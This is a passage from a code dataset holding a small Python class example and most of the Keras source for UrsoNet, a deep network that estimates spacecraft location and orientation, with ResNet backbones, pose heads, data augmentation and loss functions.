pie_plot","sub_path":"ls4408/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570497415","text":"class kettle(object):\n def __init__(self, make, price):\n self.make = make\n self.price = price\n self.on = False\n\n\nkenwood = kettle(\"kenwood\", 8.99)\nprint(kenwood.price)\nprint(kenwood.make)\n\nkenwood.price = 14.12\nprint(kenwood.price)\n\nhaminton = kettle(\"haminton\", 10.99)\n\nprint(haminton.price)\nprint(haminton.make)\n","sub_path":"oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"208004482","text":"\"\"\"\nThis is the main implementation of UrsonNet.\n\nDisclaimer:\nPart of this code was adapted from\nhttps://github.com/matterport/Mask_RCNN\nCopyright (c) 2017 Matterport, INC.\nLicenced under the MIT Licence\n\nTODO:\n- layer_regex replace 'fpn' and 'pose_'\n\n\"\"\"\n\nimport os\nimport random\nimport datetime\nimport re\nimport math\nimport logging\nfrom collections import OrderedDict\nimport multiprocessing\nimport numpy as np\nimport skimage.transform\nimport tensorflow as tf\nimport keras\nimport keras.backend as K\nimport keras.layers as KL\nimport keras.engine as KE\nimport keras.models as KM\nimport imgaug as ia\nfrom imgaug import augmenters as iaa\n\nimport utils\n\n# Requires TensorFlow 1.3+ and Keras 2.0.8+.\nfrom distutils.version import LooseVersion\n\nassert LooseVersion(tf.__version__) >= LooseVersion(\"1.3\")\nassert LooseVersion(keras.__version__) >= LooseVersion('2.0.8')\n\n############################################################\n# Utility Functions\n############################################################\n\ndef log(text, array=None):\n \"\"\"Prints a text message. And, optionally, if a Numpy array is provided it\n prints it's shape, min, and max values.\n \"\"\"\n if array is not None:\n text = text.ljust(25)\n text += (\"shape: {:20} min: {:10.5f} max: {:10.5f} {}\".format(\n str(array.shape),\n array.min() if array.size else \"\",\n array.max() if array.size else \"\",\n array.dtype))\n print(text)\n\n\nclass BatchNorm(KL.BatchNormalization):\n \"\"\"Extends the Keras BatchNormalization class to allow a central place\n to make changes if needed.\n\n Batch normalization has a negative effect on training if batches are small\n so this layer is often frozen (via setting in Config class) and functions\n as linear layer.\n \"\"\"\n\n def call(self, inputs, training=None):\n \"\"\"\n Note about training values:\n None: Train BN layers. This is the normal mode\n False: Freeze BN layers. Good when batch size is small\n True: (don't use). Set layer in training mode even when inferencing\n \"\"\"\n return super(self.__class__, self).call(inputs, training=training)\n\n############################################################\n# Resnet Graph\n############################################################\n\n# Code adopted from:\n# https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py\n\ndef identity_block(input_tensor, kernel_size, filters, stage, block,\n use_bias=True, train_bn=True):\n \"\"\"The identity_block is the block that has no conv layer at shortcut\n # Arguments\n input_tensor: input tensor\n kernel_size: defualt 3, the kernel size of middle conv layer at main path\n filters: list of integers, the nb_filters of 3 conv layer at main path\n stage: integer, current stage label, used for generating layer names\n block: 'a','b'..., current block label, used for generating layer names\n use_bias: Boolean. To use or not use a bias in conv layers.\n train_bn: Boolean. Train or freeze Batch Norm layres\n \"\"\"\n nb_filter1, nb_filter2, nb_filter3 = filters\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a',\n use_bias=use_bias)(input_tensor)\n x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n\n x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',\n name=conv_name_base + '2b', use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n\n x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c',\n use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)\n\n x = KL.Add()([x, input_tensor])\n x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)\n return x\n\n\ndef conv_block(input_tensor, kernel_size, filters, stage, block,\n strides=(2, 2), use_bias=True, train_bn=True):\n \"\"\"conv_block is the block that has a conv layer at shortcut\n # Arguments\n input_tensor: input tensor\n kernel_size: default 3, the kernel size of middle conv layer at main path\n filters: list of integers, the nb_filters of 3 conv layer at main path\n stage: integer, current stage label, used for generating layer names\n block: 'a','b'..., current block label, used for generating layer names\n use_bias: Boolean. To use or not use a bias in conv layers.\n train_bn: Boolean. Train or freeze Batch Norm layres\n Note that from stage 3, the first conv layer at main path is with subsample=(2,2)\n And the shortcut should have subsample=(2,2) as well\n \"\"\"\n nb_filter1, nb_filter2, nb_filter3 = filters\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = KL.Conv2D(nb_filter1, (1, 1), strides=strides,\n name=conv_name_base + '2a', use_bias=use_bias)(input_tensor)\n x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n\n x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',\n name=conv_name_base + '2b', use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n\n x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base +\n '2c', use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn)\n\n shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides,\n name=conv_name_base + '1', use_bias=use_bias)(input_tensor)\n shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn)\n\n x = KL.Add()([x, shortcut])\n x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x)\n return x\n\n\ndef resnet_graph(input_image, architecture, stage5=False, train_bn=True):\n \"\"\"Build a ResNet graph.\n architecture: Can be resnet50 or resnet101\n stage5: Boolean. If False, stage5 of the network is not created\n train_bn: Boolean. Train or freeze Batch Norm layres\n \"\"\"\n assert architecture in [\"resnet50\", \"resnet101\"]\n\n # Stage 1\n x = KL.ZeroPadding2D((3, 3))(input_image)\n x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x)\n x = BatchNorm(name='bn_conv1')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n # tmp\n #C1 = x = KL.Conv2D(64, (3, 3), strides=(2, 2), name='conv2')(x)\n C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding=\"same\")(x)\n # Stage 2\n x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn)\n x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn)\n C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn)\n # Stage 3\n x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn)\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn)\n x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn)\n C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn)\n # Stage 4\n x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn)\n block_count = {\"resnet50\": 5, \"resnet101\": 22}[architecture]\n for i in range(block_count):\n x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn)\n C4 = x\n # Stage 5\n if stage5:\n x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn)\n x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn)\n C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn)\n else:\n C5 = None\n return [C1, C2, C3, C4, C5]\n\n############################################################\n# Shallow Resnet\n############################################################\n\n# Code adopted from:\n# https://github.com/qubvel/classification_models/blob/master/classification_models/resnet/builder.py\n\ndef handle_block_names(stage, block):\n name_base = 'stage{}_unit{}_'.format(stage + 1, block + 1)\n conv_name = name_base + 'conv'\n bn_name = name_base + 'bn'\n relu_name = name_base + 'relu'\n sc_name = name_base + 'sc'\n return conv_name, bn_name, relu_name, sc_name\n\ndef residual_basic_block(input_tensor, filters, stage, block, strides=(1, 1), cut='pre', use_bias=False, train_bn=True):\n\n # get names of layers\n conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)\n\n # defining shortcut connection\n if cut == 'pre':\n shortcut = input_tensor\n elif cut == 'post':\n shortcut = KL.Conv2D(filters, (1, 1), name=sc_name, strides=strides, use_bias=use_bias)(input_tensor)\n else:\n raise ValueError('Cut type not in [\"pre\", \"post\"]')\n\n # Two 3x3 convolution layers\n x = KL.ZeroPadding2D(padding=(1, 1))(input_tensor)\n x = KL.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '1', use_bias=use_bias)(x)\n x = BatchNorm(name=bn_name + '2')(x, training=train_bn)\n x = KL.Activation('relu', name=relu_name + '1')(x)\n x = KL.ZeroPadding2D(padding=(1, 1))(x)\n x = KL.Conv2D(filters, (3, 3), name=conv_name + '2', use_bias=use_bias)(x)\n\n # add residual connection\n x = KL.Add()([x, shortcut])\n x = KL.Activation('relu', name=relu_name + '2')(x)\n return x\n\ndef resnet_shallow_graph(input_image, architecture, train_bn=True):\n '''\n\n N.b: Currently convolutions do not use the bias term (unlike the 'deeper' resnet_graph)\n to keep compatibility with pre-trained weights\n '''\n\n assert architecture in [\"resnet18\", \"resnet34\"]\n\n nr_init_filters = 64\n\n # Resnet bottom\n x = KL.ZeroPadding2D(padding=(3, 3))(input_image)\n x = KL.Conv2D(nr_init_filters, (7, 7), strides=(2, 2), name='conv0', use_bias=False)(x)\n x = BatchNorm(name='bn_conv0')(x, training=train_bn)\n x = KL.Activation('relu')(x)\n C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)\n\n # TODO: Allow more architectures\n if architecture == 'resnet18':\n repetitions = [2, 2, 2, 2]\n else:\n # This is fo 34 layers\n repetitions = (3, 4, 6, 3)\n\n for stage, rep in enumerate(repetitions):\n for block in range(rep):\n\n nr_filters = nr_init_filters * (2 ** stage)\n\n # first block of first stage without strides because we have maxpooling before\n if block == 0 and stage == 0:\n x = residual_basic_block(x, nr_filters, stage, block, strides=(1, 1), cut='post', train_bn=train_bn)\n\n elif block == 0:\n x = residual_basic_block(x, nr_filters, stage, block, strides=(2, 2),cut='post',train_bn=train_bn)\n\n else:\n x = residual_basic_block(x, nr_filters, stage, block, strides=(1, 1), cut='pre', train_bn=train_bn)\n\n return x\n\n############################################################\n# Network Heads\n############################################################\n\ndef build_loc_graph(feature_map, config, nr_features):\n \"\"\"Builds the computation graph for location estimation on top of the Feature Network.\n Options: (1) XYZ regression (default), (2) 3D Keypoint regression and (3) classification (experimental)\n Returns: Location [batch, N]\n \"\"\"\n\n nr_fc_layers = config.NR_DENSE_LAYERS\n assert nr_fc_layers in range(3)\n\n # TODO: Move this outside the function (redundancy)\n x = KL.Reshape((nr_features,))(feature_map)\n\n for i in range(nr_fc_layers):\n intermediate_fc_layer_name = 'loc_dense_' + str(i)\n x = KL.Dense(config.BRANCH_SIZE, name =intermediate_fc_layer_name)(x)\n\n if config.TRAIN_BN:\n bn_name = 'loc_bn_' + str(i)\n x = BatchNorm(name =bn_name)(x)\n x = KL.Activation('relu')(x)\n\n if config.REGRESS_KEYPOINTS:\n k1 = KL.Dense(3, activation='linear', name=\"k1_final\")(x)\n k2 = KL.Dense(3, activation='linear', name=\"k2_final\")(x)\n k3 = KL.Dense(3, activation='linear', name=\"k3_final\")(x)\n loc = [k1,k2,k3]\n else:\n if config.REGRESS_LOC:\n loc = KL.Dense(3, activation='linear', name=\"loc_final\")(x)\n else:\n loc = KL.Dense(config.LOC_BINS_PER_DIM**3, activation='relu', name=\"loc_final\")(x)\n\n return loc\n\ndef build_ori_graph(feature_map, config, nr_features):\n \"\"\"Builds the computation graph for orientation estimation on top of the Feature Network.\n Options: (1) 4D -vector regression (e.g. quaternion), (2) 3D-vector regression (e.g. angle-axis) and (3) classification\n Returns: Orientation [batch, N]\n \"\"\"\n\n nr_fc_layers = config.NR_DENSE_LAYERS\n assert nr_fc_layers in range(3)\n\n # TODO: Move this outside the function (redundancy)\n x = KL.Reshape((nr_features,))(feature_map)\n\n for i in range(nr_fc_layers):\n intermediate_fc_layer_name = 'ori_dense_' + str(i)\n x = KL.Dense(config.BRANCH_SIZE, name =intermediate_fc_layer_name)(x)\n\n if config.TRAIN_BN:\n bn_name = 'ori_bn_' + str(i)\n x = BatchNorm(name =bn_name)(x)\n x = KL.Activation('relu')(x)\n\n if config.REGRESS_ORI:\n if config.ORIENTATION_PARAM == 'quaternion':\n q = KL.Dense(4, activation='linear', name=\"ori_q\")(x)\n q = KL.Lambda(lambda x: K.l2_normalize(q, axis=-1))(q)\n else:\n q = KL.Dense(3, activation='linear', name=\"ori_final\")(x)\n else:\n q = KL.Dense(config.ORI_BINS_PER_DIM**3, activation='relu', name=\"ori_final\")(x)\n\n return q\n\n############################################################\n# Data Generator\n############################################################\n\ndef load_image_gt(dataset, config, image_id):\n \"\"\"Load an image + object pose and apply augmentation pipeline (if necessary)\n\n Returns:\n image: [height, width, n]\n shape: the original shape of the image before resizing and cropping.\n loc: [x,y,z]\n ori: orientation representation\n \"\"\"\n # Load and resize image\n image = dataset.load_image(image_id)\n\n if config.REGRESS_LOC:\n loc = dataset.load_location(image_id)\n else:\n loc = dataset.load_location_encoded(image_id)\n\n if config.REGRESS_KEYPOINTS:\n keypoints = dataset.load_keypoints(image_id)\n k1 = keypoints[0]\n k2 = keypoints[1]\n\n if config.REGRESS_KEYPOINTS or config.REGRESS_ORI:\n if config.ORIENTATION_PARAM == 'quaternion':\n ori = dataset.load_quaternion(image_id)\n elif config.ORIENTATION_PARAM == 'euler_angles':\n ori = dataset.load_euler_angles(image_id)\n elif config.ORIENTATION_PARAM == 'angle_axis':\n ori = dataset.load_angle_axis(image_id)\n else:\n ori = dataset.load_orientation_encoded(image_id)\n\n if config.SIM2REAL_AUG:\n image_gray = 0.2126*image[:,:,0]+0.7152*image[:,:,1]+0.0722*image[:,:,2]\n image[:, :, 0] = image_gray\n image[:, :, 1] = image_gray\n image[:, :, 2] = image_gray\n if np.random.rand(1) > 0.5:\n # Image Augmentation Pipeline\n aug_pipeline = iaa.Sequential([\n iaa.AdditiveGaussianNoise(scale=0.01 * 255),\n iaa.GaussianBlur(sigma=(0.0,1.5)),\n iaa.Add((-20, 20)),\n iaa.Multiply((0.5,2.0)),\n iaa.CoarseDropout([0.0, 0.03], size_percent=(0.02,0.1))\n ], random_order=True)\n\n det = aug_pipeline.to_deterministic()\n image = det.augment_image(image)\n\n\n if config.ROT_AUG or config.ROT_IMAGE_AUG:\n assert config.REGRESS_LOC\n assert config.ORIENTATION_PARAM == 'quaternion'\n\n # TODO: The 2 rotation augmentation operations are so far applied with mutual exclusion. Arbitrary may lead to more variation.\n\n dice = np.random.rand(1)\n\n # Camera orientation perturbation half the time\n if config.ROT_AUG and dice > 0.5:\n if config.REGRESS_KEYPOINTS or config.REGRESS_ORI:\n image, loc, ori = utils.rotate_cam(image, loc, ori, dataset.camera.K, 20)\n k1, k2 = utils.encode_as_keypoints(ori, loc)\n else:\n ori = dataset.load_quaternion(image_id)\n image, loc, ori = utils.rotate_cam(image, loc, ori, dataset.camera.K, 20)\n\n # Update encoded orientation\n ori = utils.encode_ori_fast(ori, config.BETA, dataset.ori_histogram_map, dataset.ori_output_mask)\n\n elif config.ROT_IMAGE_AUG and dice <= 0.5:\n if config.REGRESS_KEYPOINTS or config.REGRESS_ORI:\n image, loc, ori = utils.rotate_image(image, loc, ori, dataset.camera.K)\n k1, k2 = utils.encode_as_keypoints(ori, loc)\n else:\n ori = dataset.load_quaternion(image_id)\n image, loc, ori = utils.rotate_image(image, loc, ori, dataset.camera.K)\n\n # Update encoded orientation\n ori = utils.encode_ori_fast(ori, config.BETA, dataset.ori_histogram_map, dataset.ori_output_mask)\n\n original_shape = image.shape\n\n image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n\n # Image meta data\n image_meta = compose_image_meta(image_id, original_shape, image.shape,\n window, scale)\n\n if config.REGRESS_KEYPOINTS:\n return image, image_meta, loc, k1.T, k2.T\n else:\n return image, image_meta, loc, ori\n\ndef data_generator(dataset, config, shuffle=True, batch_size=1):\n \"\"\"A generator that returns images and corresponding groundtruth.\n\n dataset: The Dataset object to pick data from\n config: The model config object\n shuffle: If True, shuffles the samples before every epoch\n batch_size: How many images to return in each call\n\n Returns a Python generator. Upon calling next() on it, the\n generator returns two lists, inputs and outputs. The containtes\n of the lists differs depending on the received arguments:\n inputs list:\n - images: [batch, H, W, C]\n - image_meta: [batch, (meta data)] Image details. See compose_image_meta()\n - gt_locs: [batch, N]\n - gt_oris: [batch, N]\n \"\"\"\n b = 0 # batch item index\n image_index = -1\n image_ids = np.copy(dataset.image_ids)\n error_count = 0\n\n tensor_dtype = np.float32\n # For modern GPUs\n if config.F16:\n tensor_dtype = np.float16\n\n # Keras requires a generator to run indefinately.\n while True:\n try:\n # Increment index to pick next image. Shuffle if at the start of an epoch.\n image_index = (image_index + 1) % len(image_ids)\n if shuffle and image_index == 0:\n np.random.shuffle(image_ids)\n\n # Get GT for image.\n image_id = image_ids[image_index]\n if config.REGRESS_KEYPOINTS:\n image, image_meta, gt_loc, gt_k1, gt_k2 = load_image_gt(dataset, config, image_id)\n else:\n image, image_meta, gt_loc, gt_ori = load_image_gt(dataset, config, image_id)\n\n # Init batch arrays\n if b == 0:\n batch_image_meta = np.zeros(\n (batch_size,) + image_meta.shape, dtype=image_meta.dtype)\n batch_images = np.zeros(\n (batch_size,) + image.shape, dtype=tensor_dtype)\n\n if config.REGRESS_LOC:\n batch_gt_locs = np.zeros((batch_size, 3), dtype=tensor_dtype)\n else:\n batch_gt_locs = np.zeros((batch_size, config.LOC_BINS_PER_DIM ** 3), dtype=tensor_dtype)\n\n if config.REGRESS_KEYPOINTS:\n batch_gt_k1 = np.zeros((batch_size, 3), dtype=tensor_dtype)\n batch_gt_k2 = np.zeros((batch_size, 3), dtype=tensor_dtype)\n else:\n if config.REGRESS_ORI:\n if config.ORIENTATION_PARAM == 'quaternion':\n batch_gt_oris = np.zeros((batch_size, 4), dtype=tensor_dtype)\n else:\n batch_gt_oris = np.zeros((batch_size, 3), dtype=tensor_dtype)\n else:\n batch_gt_oris = np.zeros((batch_size, config.ORI_BINS_PER_DIM ** 3), dtype=tensor_dtype)\n\n # Add to batch\n batch_image_meta[b] = image_meta\n batch_images[b] = mold_image(image.astype(tensor_dtype), config)\n batch_gt_locs[b] = gt_loc\n\n if config.REGRESS_KEYPOINTS:\n batch_gt_k1[b] = gt_k1\n batch_gt_k2[b] = gt_k2\n else:\n batch_gt_oris[b] = gt_ori\n\n b += 1\n\n # Batch full?\n if b >= batch_size:\n if config.REGRESS_KEYPOINTS:\n inputs = [batch_images, batch_image_meta, batch_gt_locs, batch_gt_k1, batch_gt_k2]\n else:\n inputs = [batch_images, batch_image_meta, batch_gt_locs, batch_gt_oris]\n\n\n outputs = []\n\n yield inputs, outputs\n\n # start a new batch\n b = 0\n except (GeneratorExit, KeyboardInterrupt):\n raise\n except:\n # Log it and skip the image\n logging.exception(\"Error processing image {}\".format(\n dataset.image_info[image_id]))\n error_count += 1\n if error_count > 5:\n raise\n\n\n############################################################\n# NNetwork Class and Graph Initialization\n############################################################\n\nclass UrsoNet():\n\n def __init__(self, mode, config, model_dir):\n \"\"\"\n mode: Either \"training\" or \"inference\"\n config: A Sub-class of the Config class\n model_dir: Directory to save training logs and trained weights\n \"\"\"\n assert mode in ['training', 'inference']\n self.mode = mode\n self.config = config\n self.model_dir = model_dir\n self.set_log_dir()\n self.keras_model = self.build(mode=mode, config=config)\n\n def build(self, mode, config):\n \"\"\"Build UrsoNet architecture.\n input_shape: The shape of the input image.\n mode: Either \"training\" or \"inference\". The inputs and\n outputs of the model differ accordingly.\n \"\"\"\n assert mode in ['training', 'inference']\n\n # Change Keras backend to use f16 precision\n if config.F16:\n K.set_floatx('float16')\n # default is 1e-7 which is too small for float16. Without adjusting the epsilon, we will get NaN predictions because of divide by zero problems\n K.set_epsilon(1e-4)\n\n # Image size must be dividable by 2 multiple times\n h, w = config.IMAGE_SHAPE[:2]\n if h / 2 ** 6 != int(h / 2 ** 6) or w / 2 ** 6 != int(w / 2 ** 6):\n raise Exception(\"Image size must be dividable by 2 at least 6 times \"\n \"to avoid fractions when downscaling and upscaling.\"\n \"For example, use 256, 320, 384, 448, 512, ... etc. \")\n\n # Inputs\n input_image = KL.Input(shape=[None, None, config.NR_IMAGE_CHANNELS], name=\"input_image\")\n input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE], name=\"input_image_meta\")\n\n tensor_dtype = tf.float32\n if config.F16:\n tensor_dtype = tf.float16\n\n if mode == \"training\":\n\n if config.REGRESS_LOC:\n input_gt_loc = KL.Input(shape=[3], name=\"input_gt_loc\", dtype=tensor_dtype)\n else:\n input_gt_loc = KL.Input(shape=[config.LOC_BINS_PER_DIM**3], name=\"input_gt_loc\", dtype=tensor_dtype)\n\n if config.REGRESS_KEYPOINTS:\n input_gt_k2 = KL.Input(shape=[3], name=\"input_gt_k2\", dtype=tensor_dtype)\n input_gt_k3 = KL.Input(shape=[3], name=\"input_gt_k3\", dtype=tensor_dtype)\n else:\n if config.REGRESS_ORI:\n if config.ORIENTATION_PARAM == 'quaternion':\n input_gt_ori = KL.Input(shape=[4], name=\"input_gt_ori\", dtype=tensor_dtype)\n else:\n input_gt_ori = KL.Input(shape=[3], name=\"input_gt_ori\", dtype=tensor_dtype)\n else:\n input_gt_ori = KL.Input(shape=[config.ORI_BINS_PER_DIM ** 3], name=\"input_gt_ori\", dtype=tensor_dtype)\n\n # Backbone architecture\n if config.BACKBONE in ['resnet50', 'resnet101']:\n _, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE, stage5=True, train_bn=config.TRAIN_BN)\n else:\n C5 = resnet_shallow_graph(input_image, config.BACKBONE, train_bn=config.TRAIN_BN)\n\n # Original Resnet uses a 7x7 average pooling:\n # C6 = KL.GlobalAveragePooling2D()(C5)\n # but because we care about resolution, instead we perform here a convolution\n\n C6 = KL.Conv2D(config.BOTTLENECK_WIDTH, (3, 3), padding='SAME', strides=(2, 2), name='bottleneck_layer')(C5)\n nr_features = int(config.BOTTLENECK_WIDTH * config.IMAGE_SHAPE[0] * config.IMAGE_SHAPE[1] / (64 ** 2))\n\n loc_pred = build_loc_graph(C6, config, nr_features)\n ori_pred = build_ori_graph(C6, config, nr_features)\n\n if mode == \"training\":\n\n # Experimental feature\n if config.LEARNABLE_LOSS_WEIGHTS:\n self.ori_weight = K.variable(-2.3, name= 'ori_weight')\n self.loc_weight = K.variable(0.0, name= 'loc_weight')\n else:\n # Default\n self.ori_weight = K.variable(0.0, name= 'ori_weight')\n self.loc_weight = K.variable(0.0)\n\n if config.REGRESS_KEYPOINTS:\n loc_loss = KL.Lambda(lambda x: self.mse_loss_graph(*x), name=\"loc_loss\")([input_gt_loc, loc_pred[0]])\n k2_loss = KL.Lambda(lambda x: self.mse_loss_graph(*x), name=\"k2_loss\")([input_gt_k2, loc_pred[1]])\n k3_loss = KL.Lambda(lambda x: self.mse_loss_graph(*x), name=\"k3_loss\")([input_gt_k3, loc_pred[2]])\n else:\n if config.REGRESS_LOC:\n loc_loss = KL.Lambda(lambda x: self.rel_loss_graph(*x), name=\"loc_loss\")([input_gt_loc, loc_pred])\n else:\n loc_loss = KL.Lambda(lambda x: self.softmax_loss_graph(*x), name=\"loc_loss\")([input_gt_loc, loc_pred])\n\n if config.REGRESS_ORI:\n ori_loss = KL.Lambda(lambda x: self.one_minus_dot_prod_graph(*x), name=\"ori_loss\")([input_gt_ori, ori_pred])\n else:\n ori_loss = KL.Lambda(lambda x: self.softmax_loss_graph(*x), name=\"ori_loss\")([input_gt_ori, ori_pred])\n\n # Model\n if config.REGRESS_KEYPOINTS:\n inputs = [input_image, input_image_meta, input_gt_loc, input_gt_k2, input_gt_k3]\n else:\n inputs = [input_image, input_image_meta, input_gt_loc, input_gt_ori]\n\n if config.REGRESS_KEYPOINTS:\n outputs = [loc_pred[0], loc_pred[1], loc_pred[2], loc_loss, k2_loss, k3_loss]\n else:\n outputs = [loc_pred, ori_pred, loc_loss, ori_loss]\n\n model = KM.Model(inputs, outputs, name='urso_net')\n\n # Workaround to make weights trainable\n if config.LEARNABLE_LOSS_WEIGHTS:\n model.layers[-1].trainable_weights.extend([self.ori_weight, self.loc_weight])\n else:\n if config.REGRESS_KEYPOINTS:\n model = KM.Model(input_image, [loc_pred[0], loc_pred[1], loc_pred[2]], name='urso_net')\n else:\n model = KM.Model(input_image, [loc_pred, ori_pred], name='urso_net')\n\n\n # Add multi-GPU support.\n # if config.GPU_COUNT > 1:\n # from mrcnn.parallel_model import ParallelModel\n # model = ParallelModel(model, config.GPU_COUNT)\n\n return model\n\n ############################################################\n # Loss Functions\n ############################################################\n\n def softmax_loss_graph(self, y_gt, y_pred):\n \"\"\"Loss for classification prediction.\n \"\"\"\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss = tf.losses.softmax_cross_entropy(y_gt, y_pred)/tf.exp(self.ori_weight) + self.ori_weight\n loss = tf.losses.softmax_cross_entropy(y_gt, y_pred)\n return loss\n\n def arcos_graph(self, y_true, y_pred):\n \"\"\"Implements rotation error\n y_true and y_pred are typicallly: [N, 4], but could be any shape.\n \"\"\"\n loss = tf.acos(K.abs(K.sum(y_true * y_pred, axis=-1, keepdims=True)))\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss = loss/tf.exp(self.ori_weight) + self.ori_weight\n loss_mean = K.mean(loss)\n\n return loss_mean\n\n def one_minus_dot_prod_graph(self, y_true, y_pred):\n \"\"\"Implements 1-dot-product.\n y_true and y_pred are typicallly: [N, 4], but could be any shape.\n \"\"\"\n loss = 1 - K.abs(K.sum(y_true * y_pred, axis=-1, keepdims=True))\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss = loss / tf.exp(self.ori_weight) + self.ori_weight\n loss_mean = K.mean(loss)\n\n return loss_mean\n\n def mse_loss_graph(self, y_gt, y_pred):\n \"\"\"Loss for regression prediction.\n e.g.\n pose_gt: [batch, (x,y,z)]\n pose_pred: [batch, (x,y,z)]\n \"\"\"\n loss = K.square(y_gt - y_pred)\n\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss_mse = K.square(y_gt - y_pred)\n # loss = loss_mse/tf.exp(self.loc_weight) + self.loc_weight\n loss_mean = K.mean(loss)\n\n return loss_mean\n\n def rel_loss_graph(self, y_gt, y_pred):\n \"\"\"Loss for regression prediction.\n e.g.\n pose_gt: [batch, (x,y,z)]\n pose_pred: [batch, (x,y,z)]\n \"\"\"\n\n loss = tf.norm((y_gt - y_pred) / tf.norm(y_gt))\n\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss = loss/tf.exp(self.loc_weight) + self.loc_weight\n loss_mean = K.mean(loss)\n return loss_mean\n\n ############################################################\n # Weights Loading Functions\n ############################################################\n\n def get_last_checkpoint(self,model_name):\n \"\"\"Finds the last checkpoint file of a selected trained model in the\n model directory.\n Returns:\n log_dir: The directory where events and weights are saved\n checkpoint_path: the path to the last checkpoint file\n \"\"\"\n dir_names = next(os.walk(self.model_dir))[1]\n\n assert model_name in dir_names\n\n model_path = os.path.join(self.model_dir, model_name)\n checkpoints = next(os.walk(model_path))[2]\n checkpoints = filter(lambda f: f.startswith(\"weights\"), checkpoints)\n checkpoints = sorted(checkpoints)\n\n if not checkpoints:\n return model_path, None\n checkpoint = os.path.join(model_path, checkpoints[-1])\n\n return model_path, checkpoint\n\n\n def find_last(self):\n \"\"\"Finds the last checkpoint file of the last trained model in the\n model directory.\n Returns:\n log_dir: The directory where events and weights are saved\n checkpoint_path: the path to the last checkpoint file\n \"\"\"\n # Get directory names. Each directory corresponds to a model\n dir_names = next(os.walk(self.model_dir))[1]\n key = self.config.NAME.lower()\n dir_names = filter(lambda f: f.startswith(key), dir_names)\n dir_names = sorted(dir_names)\n if not dir_names:\n return None, None\n # Pick last directory\n dir_name = os.path.join(self.model_dir, dir_names[-1])\n # Find the last checkpoint\n checkpoints = next(os.walk(dir_name))[2]\n checkpoints = filter(lambda f: f.startswith(\"weights\"), checkpoints)\n checkpoints = sorted(checkpoints)\n if not checkpoints:\n return dir_name, None\n checkpoint = os.path.join(dir_name, checkpoints[-1])\n return dir_name, checkpoint\n\n def load_weights(self, weights_in_path, weights_out_path, by_name=False, exclude=None):\n \"\"\"Modified version of the correspoding Keras function with\n the addition of multi-GPU support and the ability to exclude\n some layers from loading.\n exlude: list of layer names to exclude\n \"\"\"\n import h5py\n from keras.engine import topology\n\n if exclude:\n by_name = True\n\n if h5py is None:\n raise ImportError('`load_weights` requires h5py.')\n f = h5py.File(weights_in_path, mode='r')\n if 'layer_names' not in f.attrs and 'model_weights' in f:\n f = f['model_weights']\n\n # In multi-GPU training, we wrap the model. Get layers\n # of the inner model because they have the weights.\n keras_model = self.keras_model\n layers = keras_model.inner_model.layers if hasattr(keras_model, \"inner_model\") \\\n else keras_model.layers\n\n # Exclude some layers\n if exclude:\n layers = 